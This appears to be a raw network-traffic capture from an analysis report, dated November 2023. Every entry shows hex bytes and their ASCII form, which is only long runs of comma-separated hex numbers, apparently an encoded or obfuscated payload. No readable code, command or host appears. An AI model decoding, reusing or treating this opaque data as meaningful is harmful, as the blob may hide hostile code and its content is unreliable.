                                                    2023-11-04 00:30:16 UTC608INData Raw: 34 62 2c 31 35 65 2c 31 31 31 2c 66 39 2c 31 33 64 2c 31 31 64 2c 31 32 33 2c 31 32 63 2c 36 36 2c 31 34 65 2c 31 31 63 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 65 38 2c 64 65 2c 31 36 31 2c 31 33 34 2c 31 33 65 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 32 62 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 66 65 2c 31 35 37 2c 31 35 33 2c 31 32 39 2c 64 36 2c 31 36 34 2c 31 34 62 2c 31 35 65 2c 31 32 62 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 33 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 64 34 2c 31 32 31 2c 31 33 66 2c 31 35 64 2c 63 62 2c 31 34 32 2c 31 35 63 2c 31 34 35 2c 31 34 38 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 32 2c 31 36 35 2c 31 34 62 2c 31 35 64 2c
                                                    Data Ascii: 4b,15e,111,f9,13d,11d,123,12c,66,14e,11c,156,149,137,e8,de,161,134,13e,122,13f,15d,12b,143,15c,145,fe,157,153,129,d6,164,14b,15e,12b,168,134,125,123,132,142,154,146,156,149,137,123,12a,161,134,d4,121,13f,15d,cb,142,15c,145,148,158,153,129,132,165,14b,15d,
                                                    2023-11-04 00:30:16 UTC624INData Raw: 31 31 38 2c 39 64 2c 31 33 35 2c 62 34 2c 31 34 32 2c 31 35 63 2c 31 33 62 2c 31 32 33 2c 31 30 62 2c 31 35 32 2c 31 32 39 2c 31 32 62 2c 65 35 2c 62 31 2c 31 35 65 2c 31 33 63 2c 31 36 34 2c 62 36 2c 38 62 2c 31 32 33 2c 31 33 32 2c 31 33 65 2c 64 39 2c 66 38 2c 31 35 35 2c 31 34 39 2c 31 32 64 2c 61 62 2c 39 30 2c 31 36 31 2c 31 33 34 2c 31 33 63 2c 31 31 61 2c 64 30 2c 31 30 61 2c 31 33 63 2c 31 34 33 2c 31 35 32 2c 64 36 2c 62 36 2c 31 35 37 2c 31 35 33 2c 31 31 66 2c 31 31 35 2c 66 38 2c 31 31 31 2c 38 30 2c 31 30 34 2c 31 33 64 2c 31 33 34 2c 66 64 2c 31 31 65 2c 31 33 32 2c 31 34 32 2c 31 32 39 2c 64 37 2c 31 30 34 2c 31 34 38 2c 31 33 37 2c 31 31 66 2c 61 63 2c 37 61 2c 31 33 34 2c 31 34 30 2c 31 31 38 2c 64 30 2c 62 63 2c 31 33 63 2c 31 34 33 2c
                                                    Data Ascii: 118,9d,135,b4,142,15c,13b,123,10b,152,129,12b,e5,b1,15e,13c,164,b6,8b,123,132,13e,d9,f8,155,149,12d,ab,90,161,134,13c,11a,d0,10a,13c,143,152,d6,b6,157,153,11f,115,f8,111,80,104,13d,134,fd,11e,132,142,129,d7,104,148,137,11f,ac,7a,134,140,118,d0,bc,13c,143,
                                                    2023-11-04 00:30:16 UTC640INData Raw: 33 32 2c 31 33 38 2c 31 33 34 2c 37 31 2c 31 34 66 2c 38 37 2c 63 65 2c 31 30 31 2c 31 32 30 2c 31 36 31 2c 31 33 34 2c 31 31 35 2c 61 66 2c 31 33 33 2c 31 35 63 2c 31 33 64 2c 31 33 39 2c 31 33 34 2c 31 30 65 2c 31 34 61 2c 31 35 38 2c 31 34 39 2c 66 64 2c 31 30 65 2c 31 35 65 2c 64 63 2c 31 34 63 2c 31 33 62 2c 31 36 38 2c 31 32 61 2c 31 30 65 2c 39 36 2c 35 66 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 33 31 2c 31 33 33 2c 31 31 37 2c 31 32 38 2c 31 30 38 2c 65 63 2c 62 61 2c 31 31 38 2c 31 31 39 2c 31 33 66 2c 31 35 64 2c 31 31 32 2c 64 30 2c 31 35 30 2c 31 34 34 2c 31 34 62 2c 31 34 65 2c 62 31 2c 31 31 33 2c 63 36 2c 31 34 37 2c 31 34 61 2c 31 35 65 2c 31 33 32 2c 31 35 31 2c 39 61 2c 31 31 39 2c 31 30 33 2c 31 30 39 2c 39 38 2c 64 65 2c 31 34 32 2c
                                                    Data Ascii: 32,138,134,71,14f,87,ce,101,120,161,134,115,af,133,15c,13d,139,134,10e,14a,158,149,fd,10e,15e,dc,14c,13b,168,12a,10e,96,5f,142,154,145,131,133,117,128,108,ec,ba,118,119,13f,15d,112,d0,150,144,14b,14e,b1,113,c6,147,14a,15e,132,151,9a,119,103,109,98,de,142,
                                                    2023-11-04 00:30:16 UTC656INData Raw: 61 35 2c 63 63 2c 38 64 2c 31 31 31 2c 31 36 38 2c 31 30 63 2c 31 32 34 2c 31 32 33 2c 31 33 32 2c 31 31 37 2c 31 34 30 2c 37 36 2c 31 32 34 2c 31 34 39 2c 31 33 37 2c 31 32 37 2c 31 30 32 2c 31 30 64 2c 31 33 34 2c 31 34 30 2c 31 31 38 2c 31 32 37 2c 64 30 2c 31 33 62 2c 31 34 32 2c 31 35 63 2c 31 34 34 2c 31 32 36 2c 31 34 32 2c 31 33 63 2c 31 31 35 2c 31 30 64 2c 31 31 61 2c 31 34 61 2c 31 35 65 2c 31 33 32 2c 63 36 2c 31 30 66 2c 31 30 65 2c 31 30 64 2c 31 31 65 2c 31 31 61 2c 31 30 39 2c 31 34 35 2c 31 35 36 2c 31 33 66 2c 39 35 2c 31 30 31 2c 64 65 2c 31 36 30 2c 31 33 34 2c 31 33 36 2c 66 61 2c 35 34 2c 31 35 63 2c 31 33 64 2c 31 33 39 2c 64 63 2c 39 34 2c 31 34 62 2c 31 35 38 2c 31 34 66 2c 61 62 2c 38 34 2c 31 36 35 2c 31 34 62 2c 31 35 61 2c 63
                                                    Data Ascii: a5,cc,8d,111,168,10c,124,123,132,117,140,76,124,149,137,127,102,10d,134,140,118,127,d0,13b,142,15c,144,126,142,13c,115,10d,11a,14a,15e,132,c6,10f,10e,10d,11e,11a,109,145,156,13f,95,101,de,160,134,136,fa,54,15c,13d,139,dc,94,14b,158,14f,ab,84,165,14b,15a,c
                                                    2023-11-04 00:30:16 UTC672INData Raw: 2c 31 34 32 2c 31 35 34 2c 66 64 2c 31 35 36 2c 31 34 39 2c 31 32 36 2c 31 32 37 2c 31 30 32 2c 31 32 63 2c 31 33 33 2c 31 34 30 2c 31 31 38 2c 31 31 33 2c 31 30 64 2c 31 33 62 2c 31 32 61 2c 31 34 35 2c 31 32 63 2c 64 38 2c 31 35 37 2c 31 35 31 2c 31 32 39 2c 31 32 62 2c 31 35 62 2c 31 34 35 2c 31 33 65 2c 35 39 2c 31 36 34 2c 31 33 34 2c 31 32 35 2c 66 62 2c 31 33 30 2c 31 34 30 2c 31 35 34 2c 31 33 63 2c 65 33 2c 31 34 36 2c 31 33 35 2c 31 32 39 2c 31 32 30 2c 31 35 36 2c 31 32 64 2c 64 31 2c 31 31 64 2c 31 33 64 2c 31 35 64 2c 31 33 33 2c 31 33 37 2c 37 65 2c 31 31 32 2c 31 34 34 2c 31 32 63 2c 31 34 64 2c 31 32 32 2c 63 36 2c 31 34 36 2c 31 34 62 2c 31 35 65 2c 31 33 32 2c 38 63 2c 31 32 65 2c 66 39 2c 31 31 64 2c 31 32 63 2c 64 33 2c 31 33 35 2c 31
                                                    Data Ascii: ,142,154,fd,156,149,126,127,102,12c,133,140,118,113,10d,13b,12a,145,12c,d8,157,151,129,12b,15b,145,13e,59,164,134,125,fb,130,140,154,13c,e3,146,135,129,120,156,12d,d1,11d,13d,15d,133,137,7e,112,144,12c,14d,122,c6,146,14b,15e,132,8c,12e,f9,11d,12c,d3,135,1
                                                    2023-11-04 00:30:16 UTC688INData Raw: 61 2c 31 35 31 2c 31 32 36 2c 31 35 35 2c 31 33 30 2c 66 61 2c 31 31 32 2c 31 32 61 2c 31 33 39 2c 31 33 65 2c 31 33 35 2c 31 35 31 2c 64 61 2c 64 64 2c 31 32 39 2c 31 32 61 2c 31 35 37 2c 31 32 33 2c 31 33 63 2c 31 31 31 2c 31 33 61 2c 31 30 35 2c 31 32 61 2c 31 33 66 2c 31 35 35 2c 31 33 63 2c 31 33 35 2c 31 33 38 2c 31 35 33 2c 31 32 35 2c 31 33 35 2c 31 36 35 2c 64 63 2c 31 31 37 2c 31 33 63 2c 31 36 38 2c 31 32 61 2c 31 30 30 2c 31 31 30 2c 31 32 64 2c 31 32 63 2c 31 32 34 2c 36 61 2c 31 35 33 2c 31 34 31 2c 63 38 2c 39 31 2c 31 32 38 2c 31 36 31 2c 31 32 61 2c 31 32 61 2c 31 31 31 2c 31 33 62 2c 65 65 2c 65 63 2c 31 34 33 2c 31 35 63 2c 31 33 62 2c 31 33 38 2c 31 35 32 2c 37 35 2c 31 30 62 2c 31 32 64 2c 31 33 39 2c 31 34 35 2c 31 35 36 2c 63 64 2c
                                                    Data Ascii: a,151,126,155,130,fa,112,12a,139,13e,135,151,da,dd,129,12a,157,123,13c,111,13a,105,12a,13f,155,13c,135,138,153,125,135,165,dc,117,13c,168,12a,100,110,12d,12c,124,6a,153,141,c8,91,128,161,12a,12a,111,13b,ee,ec,143,15c,13b,138,152,75,10b,12d,139,145,156,cd,
                                                    2023-11-04 00:30:16 UTC704INData Raw: 66 2c 31 32 61 2c 31 33 37 2c 31 33 30 2c 31 32 33 2c 62 62 2c 62 39 2c 31 33 31 2c 31 34 30 2c 31 31 38 2c 31 31 33 2c 31 35 34 2c 31 33 36 2c 31 34 31 2c 31 35 36 2c 64 36 2c 61 32 2c 31 35 35 2c 31 35 33 2c 31 31 66 2c 31 30 62 2c 31 35 66 2c 31 32 33 2c 62 34 2c 31 33 39 2c 31 36 38 2c 31 32 61 2c 31 31 61 2c 31 31 63 2c 31 30 36 2c 31 32 63 2c 31 34 64 2c 31 34 34 2c 65 37 2c 31 33 30 2c 31 33 35 2c 31 32 39 2c 31 32 30 2c 66 32 2c 38 39 2c 31 33 64 2c 31 32 32 2c 31 33 35 2c 31 33 31 2c 31 33 35 2c 31 33 63 2c 31 35 61 2c 64 36 2c 39 66 2c 31 35 35 2c 31 35 33 2c 31 31 66 2c 31 30 62 2c 31 36 33 2c 63 64 2c 62 31 2c 31 33 39 2c 31 36 38 2c 31 32 61 2c 66 32 2c 31 32 31 2c 31 31 65 2c 31 31 38 2c 31 35 32 2c 31 31 63 2c 31 35 36 2c 31 34 39 2c 31 33
                                                    Data Ascii: f,12a,137,130,123,bb,b9,131,140,118,113,154,136,141,156,d6,a2,155,153,11f,10b,15f,123,b4,139,168,12a,11a,11c,106,12c,14d,144,e7,130,135,129,120,f2,89,13d,122,135,131,135,13c,15a,d6,9f,155,153,11f,10b,163,cd,b1,139,168,12a,f2,121,11e,118,152,11c,156,149,13
                                                    2023-11-04 00:30:16 UTC720INData Raw: 31 36 31 2c 31 33 33 2c 31 32 35 2c 66 32 2c 31 33 64 2c 31 35 64 2c 31 31 31 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 63 61 2c 31 35 38 2c 31 35 33 2c 31 31 38 2c 31 33 33 2c 31 33 39 2c 31 34 33 2c 31 35 63 2c 62 65 2c 62 62 2c 31 33 31 2c 31 32 35 2c 31 31 39 2c 66 66 2c 31 33 36 2c 31 34 32 2c 31 34 36 2c 31 35 38 2c 31 33 34 2c 61 63 2c 31 32 39 2c 31 32 61 2c 31 34 36 2c 31 32 65 2c 31 33 36 2c 34 34 2c 31 32 63 2c 31 35 62 2c 31 31 35 2c 38 37 2c 31 35 39 2c 31 34 35 2c 31 34 31 2c 65 35 2c 37 65 2c 31 32 36 2c 31 33 35 2c 31 35 62 2c 31 34 31 2c 38 30 2c 31 33 37 2c 31 34 32 2c 31 33 31 2c 31 31 62 2c 34 35 2c 31 33 32 2c 31 33 63 2c 31 32 61 2c 31 34 35 2c 31 34 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 31 62
                                                    Data Ascii: 161,133,125,f2,13d,15d,111,143,15c,145,ca,158,153,118,133,139,143,15c,be,bb,131,125,119,ff,136,142,146,158,134,ac,129,12a,146,12e,136,44,12c,15b,115,87,159,145,141,e5,7e,126,135,15b,141,80,137,142,131,11b,45,132,13c,12a,145,146,149,137,129,12a,161,134,11b
                                                    2023-11-04 00:30:16 UTC736INData Raw: 31 35 34 2c 31 33 64 2c 31 34 34 2c 31 34 39 2c 31 33 32 2c 35 32 2c 31 32 61 2c 31 36 31 2c 31 33 33 2c 31 32 35 2c 66 32 2c 31 33 65 2c 31 35 64 2c 31 32 38 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 33 31 2c 31 35 38 2c 31 35 33 2c 31 31 38 2c 31 33 33 2c 31 33 64 2c 31 35 36 2c 31 35 62 2c 31 33 63 2c 31 35 65 2c 31 32 61 2c 34 37 2c 31 31 39 2c 31 30 63 2c 31 33 66 2c 65 35 2c 31 35 30 2c 31 35 33 2c 31 34 39 2c 31 32 64 2c 31 31 66 2c 34 63 2c 31 36 31 2c 31 32 65 2c 31 31 36 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 33 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 32 63 2c 31 35 63 2c 31 34 62 2c 31 35 34 2c 36 35 2c 31 36 38 2c 31 33 34 2c 31 32 34 2c 31 30 38 2c 31 30 32 2c 31 34 31 2c 31 35 34 2c 31
                                                    Data Ascii: 154,13d,144,149,132,52,12a,161,133,125,f2,13e,15d,128,143,15c,145,131,158,153,118,133,13d,156,15b,13c,15e,12a,47,119,10c,13f,e5,150,153,149,12d,11f,4c,161,12e,116,122,13f,15d,13c,133,15c,145,14b,158,153,129,12c,15c,14b,154,65,168,134,124,108,102,141,154,1
                                                    2023-11-04 00:30:16 UTC752INData Raw: 36 61 2c 31 34 36 2c 31 33 37 2c 31 32 39 2c 31 32 34 2c 31 34 31 2c 34 65 2c 39 31 2c 39 39 2c 64 30 2c 31 33 32 2c 31 33 64 2c 31 31 62 2c 31 35 62 2c 31 34 35 2c 31 34 62 2c 31 32 64 2c 31 32 62 2c 63 33 2c 31 33 34 2c 31 36 35 2c 31 34 31 2c 31 32 34 2c 63 31 2c 31 36 35 2c 31 33 34 2c 31 32 35 2c 65 62 2c 36 32 2c 31 33 66 2c 31 35 34 2c 31 34 36 2c 31 35 30 2c 31 32 39 2c 35 36 2c 61 36 2c 38 63 2c 31 31 31 2c 31 30 39 2c 31 34 30 2c 66 61 2c 31 33 62 2c 31 35 64 2c 31 33 64 2c 31 31 38 2c 31 33 34 2c 64 66 2c 31 34 61 2c 31 35 38 2c 31 34 39 2c 65 66 2c 64 33 2c 31 36 32 2c 31 34 62 2c 31 35 65 2c 31 30 34 2c 62 34 2c 31 33 31 2c 31 32 35 2c 31 32 33 2c 31 32 63 2c 31 32 32 2c 65 63 2c 31 34 63 2c 38 38 2c 64 36 2c 31 30 63 2c 31 32 39 2c 31 30 32
                                                    Data Ascii: 6a,146,137,129,124,141,4e,91,99,d0,132,13d,11b,15b,145,14b,12d,12b,c3,134,165,141,124,c1,165,134,125,eb,62,13f,154,146,150,129,56,a6,8c,111,109,140,fa,13b,15d,13d,118,134,df,14a,158,149,ef,d3,162,14b,15e,104,b4,131,125,123,12c,122,ec,14c,88,d6,10c,129,102
                                                    2023-11-04 00:30:16 UTC768INData Raw: 31 34 33 2c 31 31 36 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 30 64 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 30 35 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 66 38 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 30 36 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 30 64 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 32 35 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 30 33 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 32 30 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 34 62 2c 31 30 61 2c 64 61 2c 31 30 63 2c 31 30 36 2c 31 35 38 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 30 61 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 32 66 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 31 63 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 31 39 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 34 32 2c 31 33 64 2c 31
                                                    Data Ascii: 143,116,145,14b,158,10d,129,135,165,105,15e,13c,168,f8,125,123,132,106,154,146,156,10d,137,129,12a,125,134,140,122,103,15d,13d,143,120,145,14b,158,14b,10a,da,10c,106,158,13c,168,134,10a,123,132,142,12f,146,156,149,11c,129,12a,161,119,140,122,13f,142,13d,1
                                                    2023-11-04 00:30:16 UTC784INData Raw: 64 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 32 35 2c 66 32 2c 31 33 64 2c 31 35 64 2c 66 63 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 39 34 2c 31 35 38 2c 31 35 33 2c 31 31 38 2c 31 33 33 2c 66 36 2c 61 31 2c 31 35 61 2c 31 33 63 2c 31 35 65 2c 31 32 61 2c 31 31 66 2c 31 32 30 2c 63 33 2c 39 32 2c 31 35 30 2c 31 34 36 2c 31 34 63 2c 31 34 33 2c 31 33 32 2c 62 61 2c 37 39 2c 31 35 64 2c 31 33 34 2c 31 33 36 2c 31 31 63 2c 31 33 31 2c 31 35 39 2c 63 65 2c 39 31 2c 31 35 38 2c 31 34 35 2c 31 34 31 2c 31 35 34 2c 31 32 37 2c 31 31 64 2c 31 32 66 2c 66 36 2c 39 38 2c 31 35 61 2c 31 33 63 2c 31 35 65 2c 31 33 30 2c 62 36 2c 36 66 2c 31 32 65 2c 31 34 32 2c 31 34 61 2c 31 34 30 2c 65 37 2c 39 64 2c 31 33 33 2c 31 32 39 2c 31 32 30 2c 31 35 36 2c 35 36
                                                    Data Ascii: d,129,12a,161,134,125,f2,13d,15d,fc,143,15c,145,94,158,153,118,133,f6,a1,15a,13c,15e,12a,11f,120,c3,92,150,146,14c,143,132,ba,79,15d,134,136,11c,131,159,ce,91,158,145,141,154,127,11d,12f,f6,98,15a,13c,15e,130,b6,6f,12e,142,14a,140,e7,9d,133,129,120,156,56
                                                    2023-11-04 00:30:16 UTC800INData Raw: 2c 31 31 64 2c 31 30 36 2c 31 33 63 2c 31 34 65 2c 64 37 2c 31 33 37 2c 31 34 39 2c 31 33 37 2c 31 31 66 2c 34 65 2c 31 35 39 2c 31 30 61 2c 31 33 66 2c 31 30 36 2c 31 33 66 2c 31 35 64 2c 31 33 62 2c 31 34 33 2c 31 34 37 2c 31 34 35 2c 31 34 32 2c 31 33 61 2c 31 35 33 2c 31 31 66 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 61 2c 31 36 38 2c 31 32 64 2c 31 32 35 2c 31 30 32 2c 31 30 61 2c 31 34 32 2c 31 34 61 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 30 65 2c 66 61 2c 31 35 66 2c 31 33 34 2c 65 37 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 37 37 2c 31 34 33 2c 31 35 63 2c 31 33 34 2c 31 34 39 2c 65 39 2c 36 66 2c 31 32 35 2c 31 33 35 2c 31 35 62 2c 31 34 31 2c 31 35 38 2c 31 33 39 2c 66 39 2c 38 34 2c 31 32 31 2c 31 32 33 2c 31 32 38
                                                    Data Ascii: ,11d,106,13c,14e,d7,137,149,137,11f,4e,159,10a,13f,106,13f,15d,13b,143,147,145,142,13a,153,11f,135,165,14b,15e,13a,168,12d,125,102,10a,142,14a,146,156,149,137,10e,fa,15f,134,e7,122,13f,15d,77,143,15c,134,149,e9,6f,125,135,15b,141,158,139,f9,84,121,123,128
                                                    2023-11-04 00:30:16 UTC816INData Raw: 65 2c 35 32 2c 31 36 38 2c 31 33 34 2c 31 31 34 2c 62 30 2c 31 31 38 2c 31 33 61 2c 31 35 34 2c 31 34 30 2c 31 34 63 2c 31 34 33 2c 31 33 32 2c 61 63 2c 65 66 2c 31 36 30 2c 31 33 34 2c 31 33 63 2c 31 32 30 2c 64 30 2c 31 34 62 2c 31 33 63 2c 31 34 33 2c 31 35 32 2c 31 34 32 2c 31 34 37 2c 31 33 30 2c 31 34 33 2c 31 32 34 2c 31 33 35 2c 31 35 62 2c 63 64 2c 31 36 30 2c 31 33 63 2c 31 36 38 2c 31 33 30 2c 31 30 30 2c 66 36 2c 31 31 62 2c 31 31 63 2c 64 36 2c 37 31 2c 31 35 36 2c 31 34 39 2c 31 33 33 2c 31 32 62 2c 31 32 34 2c 39 33 2c 31 32 64 2c 31 34 30 2c 31 31 63 2c 63 63 2c 31 34 66 2c 31 33 38 2c 31 34 33 2c 31 35 32 2c 31 32 30 2c 63 62 2c 31 35 61 2c 31 35 33 2c 31 32 39 2c 31 33 31 2c 31 33 64 2c 62 64 2c 31 35 65 2c 31 33 63 2c 31 33 64 2c 31 32
                                                    Data Ascii: e,52,168,134,114,b0,118,13a,154,140,14c,143,132,ac,ef,160,134,13c,120,d0,14b,13c,143,152,142,147,130,143,124,135,15b,cd,160,13c,168,130,100,f6,11b,11c,d6,71,156,149,133,12b,124,93,12d,140,11c,cc,14f,138,143,152,120,cb,15a,153,129,131,13d,bd,15e,13c,13d,12
                                                    2023-11-04 00:30:16 UTC832INData Raw: 36 2c 31 30 64 2c 31 35 33 2c 31 35 33 2c 31 31 66 2c 31 30 39 2c 31 35 33 2c 31 33 34 2c 31 35 31 2c 31 31 63 2c 63 66 2c 37 66 2c 33 66 2c 31 32 61 2c 31 30 37 2c 31 34 32 2c 31 32 63 2c 31 34 33 2c 31 35 36 2c 31 34 39 2c 31 30 63 2c 31 31 36 2c 31 32 35 2c 31 33 36 2c 64 33 2c 31 32 66 2c 31 31 36 2c 64 30 2c 31 31 65 2c 31 33 38 2c 31 34 33 2c 31 35 32 2c 31 31 39 2c 31 33 39 2c 31 34 30 2c 31 34 36 2c 31 30 39 2c 31 33 64 2c 64 31 2c 66 63 2c 31 30 36 2c 31 31 31 2c 31 36 38 2c 31 30 63 2c 31 32 31 2c 31 32 33 2c 31 33 32 2c 31 31 37 2c 31 34 31 2c 31 34 31 2c 31 32 62 2c 31 30 33 2c 31 32 36 2c 31 31 64 2c 62 62 2c 31 32 31 2c 31 32 66 2c 31 34 30 2c 31 31 38 2c 31 31 33 2c 31 34 62 2c 31 32 34 2c 31 33 36 2c 31 33 63 2c 31 30 61 2c 31 34 34 2c 62
                                                    Data Ascii: 6,10d,153,153,11f,109,153,134,151,11c,cf,7f,3f,12a,107,142,12c,143,156,149,10c,116,125,136,d3,12f,116,d0,11e,138,143,152,119,139,140,146,109,13d,d1,fc,106,111,168,10c,121,123,132,117,141,141,12b,103,126,11d,bb,121,12f,140,118,113,14b,124,136,13c,10a,144,b
                                                    2023-11-04 00:30:16 UTC848INData Raw: 2c 31 32 66 2c 31 35 62 2c 31 34 35 2c 31 35 62 2c 62 66 2c 31 31 37 2c 31 33 33 2c 31 32 35 2c 31 31 66 2c 31 33 30 2c 31 31 61 2c 66 39 2c 31 33 66 2c 31 35 36 2c 31 34 33 2c 31 33 31 2c 31 32 62 2c 31 32 34 2c 31 32 34 2c 31 32 63 2c 31 34 30 2c 31 31 63 2c 63 63 2c 65 36 2c 31 33 38 2c 31 34 33 2c 31 35 32 2c 31 31 64 2c 62 30 2c 31 35 38 2c 31 35 33 2c 66 65 2c 31 30 64 2c 63 39 2c 31 34 62 2c 31 35 65 2c 31 31 31 2c 31 35 64 2c 31 32 64 2c 39 37 2c 66 36 2c 31 33 30 2c 31 32 65 2c 31 32 61 2c 31 33 66 2c 63 38 2c 65 30 2c 31 32 30 2c 66 36 2c 31 32 36 2c 31 35 61 2c 31 31 65 2c 61 36 2c 66 38 2c 31 31 66 2c 39 39 2c 35 34 2c 66 35 2c 31 32 62 2c 31 31 61 2c 31 34 62 2c 31 33 30 2c 31 34 66 2c 31 32 39 2c 31 33 35 2c 31 33 61 2c 31 34 34 2c 64 30 2c
                                                    Data Ascii: ,12f,15b,145,15b,bf,117,133,125,11f,130,11a,f9,13f,156,143,131,12b,124,124,12c,140,11c,cc,e6,138,143,152,11d,b0,158,153,fe,10d,c9,14b,15e,111,15d,12d,97,f6,130,12e,12a,13f,c8,e0,120,f6,126,15a,11e,a6,f8,11f,99,54,f5,12b,11a,14b,130,14f,129,135,13a,144,d0,
                                                    2023-11-04 00:30:16 UTC864INData Raw: 2c 31 34 35 2c 64 64 2c 31 35 63 2c 31 32 63 2c 66 39 2c 66 38 2c 31 33 30 2c 63 37 2c 31 30 36 2c 31 34 35 2c 31 35 36 2c 31 34 35 2c 31 32 66 2c 31 31 32 2c 63 62 2c 31 33 34 2c 31 32 36 2c 31 32 30 2c 36 37 2c 36 37 2c 31 35 39 2c 31 31 33 2c 31 31 38 2c 31 35 63 2c 31 31 64 2c 31 34 39 2c 31 35 38 2c 31 35 33 2c 66 65 2c 31 30 61 2c 31 35 39 2c 31 32 62 2c 66 37 2c 61 30 2c 31 37 34 2c 39 33 2c 66 61 2c 31 32 33 2c 31 30 61 2c 31 33 65 2c 31 35 34 2c 31 34 36 2c 31 32 62 2c 64 61 2c 31 32 64 2c 31 32 35 2c 31 32 61 2c 31 35 37 2c 31 30 65 2c 31 33 39 2c 31 30 62 2c 65 37 2c 31 35 32 2c 31 33 36 2c 31 33 64 2c 63 65 2c 64 63 2c 31 31 39 2c 39 62 2c 31 35 30 2c 31 30 31 2c 31 32 65 2c 31 35 65 2c 31 34 62 2c 31 35 38 2c 31 31 32 2c 31 36 38 2c 31 33 34
                                                    Data Ascii: ,145,dd,15c,12c,f9,f8,130,c7,106,145,156,145,12f,112,cb,134,126,120,67,67,159,113,118,15c,11d,149,158,153,fe,10a,159,12b,f7,a0,174,93,fa,123,10a,13e,154,146,12b,da,12d,125,12a,157,10e,139,10b,e7,152,136,13d,ce,dc,119,9b,150,101,12e,15e,14b,158,112,168,134
                                                    2023-11-04 00:30:16 UTC880INData Raw: 39 2c 34 61 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 66 66 2c 31 36 37 2c 31 33 34 2c 31 31 34 2c 62 30 2c 35 62 2c 31 34 31 2c 31 35 34 2c 31 33 63 2c 31 34 63 2c 63 62 2c 66 32 2c 31 32 33 2c 31 32 61 2c 31 35 37 2c 31 31 34 2c 65 64 2c 38 66 2c 61 30 2c 61 66 2c 31 31 32 2c 31 34 33 2c 31 33 34 2c 31 34 32 2c 31 34 62 2c 31 35 38 2c 31 32 38 2c 62 61 2c 36 35 2c 31 36 34 2c 31 34 62 2c 31 35 34 2c 31 33 31 2c 31 36 31 2c 31 30 37 2c 31 30 65 2c 61 35 2c 65 64 2c 31 33 63 2c 31 35 34 2c 31 33 63 2c 31 33 36 2c 38 61 2c 62 33 2c 31 32 31 2c 33 64 2c 31 33 36 2c 31 33 34 2c 31 31 38 2c 31 32 31 2c 31 33 66 2c 31 35 64 2c 31 31 32 2c 64 34 2c 38 63 2c 31 34 34 2c 31 34 62 2c 31 34 65 2c 31 34 38 2c 31 32 32 2c 63 36 2c 31 31 66 2c 31 34 35 2c 31 35 65 2c 31
                                                    Data Ascii: 9,4a,165,14b,15e,ff,167,134,114,b0,5b,141,154,13c,14c,cb,f2,123,12a,157,114,ed,8f,a0,af,112,143,134,142,14b,158,128,ba,65,164,14b,154,131,161,107,10e,a5,ed,13c,154,13c,136,8a,b3,121,3d,136,134,118,121,13f,15d,112,d4,8c,144,14b,14e,148,122,c6,11f,145,15e,1
                                                    2023-11-04 00:30:16 UTC896INData Raw: 2c 66 33 2c 39 32 2c 31 32 35 2c 31 31 63 2c 31 33 32 2c 31 33 64 2c 31 31 62 2c 31 35 38 2c 31 34 35 2c 31 34 62 2c 31 32 64 2c 31 33 31 2c 31 32 39 2c 31 33 35 2c 62 35 2c 31 30 61 2c 65 62 2c 63 36 2c 31 36 38 2c 31 33 34 2c 31 31 62 2c 62 34 2c 62 62 2c 31 34 32 2c 31 35 34 2c 31 33 63 2c 31 35 34 2c 63 65 2c 62 30 2c 31 32 38 2c 31 32 61 2c 31 35 64 2c 31 31 34 2c 31 34 36 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 31 64 2c 31 34 39 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 33 38 2c 31 35 39 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 32 33 2c 64 32 2c 31 33 63 2c 31 36 38 2c 31 32 61 2c 62 36 2c 31 32 30 2c 31 33 32 2c 31 34 32 2c 31 34 61 2c 31 34 34 2c 64 62 2c 63 32 2c 31 33 36 2c 31 32 39 2c 31 32 36 2c 31 34 31 2c 39 34 2c 31 33 66 2c 31 32 32 2c
                                                    Data Ascii: ,f3,92,125,11c,132,13d,11b,158,145,14b,12d,131,129,135,b5,10a,eb,c6,168,134,11b,b4,bb,142,154,13c,154,ce,b0,128,12a,15d,114,146,122,13f,15d,11d,149,15c,145,14b,138,159,129,135,165,123,d2,13c,168,12a,b6,120,132,142,14a,144,db,c2,136,129,126,141,94,13f,122,
